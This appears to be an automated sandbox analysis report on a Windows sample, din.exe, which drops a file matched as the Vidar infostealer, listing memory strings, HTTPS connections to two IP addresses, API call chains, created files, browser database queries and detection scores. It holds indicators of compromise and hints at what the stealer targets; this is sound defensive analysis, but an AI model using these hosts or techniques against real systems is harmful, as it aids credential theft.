                Source: chrome.exe, 00000015.00000002.1888343556.000036EC006F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000015.00000002.1888343556.000036EC006F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000015.00000002.1892979458.000036EC00F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000015.00000003.1854619401.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853732820.000036EC01CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853678893.000036EC01CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1895176047.000036EC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855954556.000036EC01CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855483232.000036EC01C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1855244225.000036EC01C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.7:49766 version: TLS 1.2
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00F7F7C7
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,16_2_00F7F55C
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F99FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00F99FD2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F74763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,16_2_00F74763
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00F61B4D
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00F6F20D
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Windows\CoursesNutritionalJump to behavior
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Windows\PleaseResearchJump to behavior
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Windows\AfricaDtsJump to behavior
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Windows\CloseVanillaJump to behavior
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Windows\PositionDisclaimersJump to behavior
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Windows\RequirementsProgramJump to behavior
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Windows\ToiletDeterminesJump to behavior
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F2801716_2_00F28017
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F0E1F016_2_00F0E1F0
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F1E14416_2_00F1E144
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F222A216_2_00F222A2
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F022AD16_2_00F022AD
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3A26E16_2_00F3A26E
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F1C62416_2_00F1C624
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F8C8A416_2_00F8C8A4
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3E87F16_2_00F3E87F
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F36ADE16_2_00F36ADE
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F72A0516_2_00F72A05
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F68BFF16_2_00F68BFF
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F1CD7A16_2_00F1CD7A
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F2CE1016_2_00F2CE10
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3715916_2_00F37159
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F0924016_2_00F09240
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F9531116_2_00F95311
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F096E016_2_00F096E0
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F2170416_2_00F21704
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F21A7616_2_00F21A76
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F27B8B16_2_00F27B8B
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F09B6016_2_00F09B60
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F27DBA16_2_00F27DBA
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F21D2016_2_00F21D20
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F21FE716_2_00F21FE7
                Source: C:\Users\user\Desktop\din.exeCode function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: String function: 00F20DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: String function: 00F1FD52 appears 40 times
                Source: din.exeStatic PE information: invalid certificate
                Source: din.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 5F3EKF.16.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@82/297@21/16
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F741FA GetLastError,FormatMessageW,16_2_00F741FA
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F62010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00F62010
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61A0B AdjustTokenPrivileges,CloseHandle,16_2_00F61A0B
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,16_2_00F6DD87
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F73A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,16_2_00F73A0E
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\U30MZHCO.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
                Source: C:\Users\user\Desktop\din.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsa2B2E.tmpJump to behavior
                Source: din.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\din.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\din.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chrome.exe, 00000015.00000002.1888343556.000036EC006F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: chrome.exe, 00000015.00000002.1886143572.000036EC00134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};6
                Source: KF3O89HVK.16.dr, EUA1N7YM7.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: din.exeVirustotal: Detection: 22%
                Source: din.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\din.exeFile read: C:\Users\user\Desktop\din.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\din.exe "C:\Users\user\Desktop\din.exe"
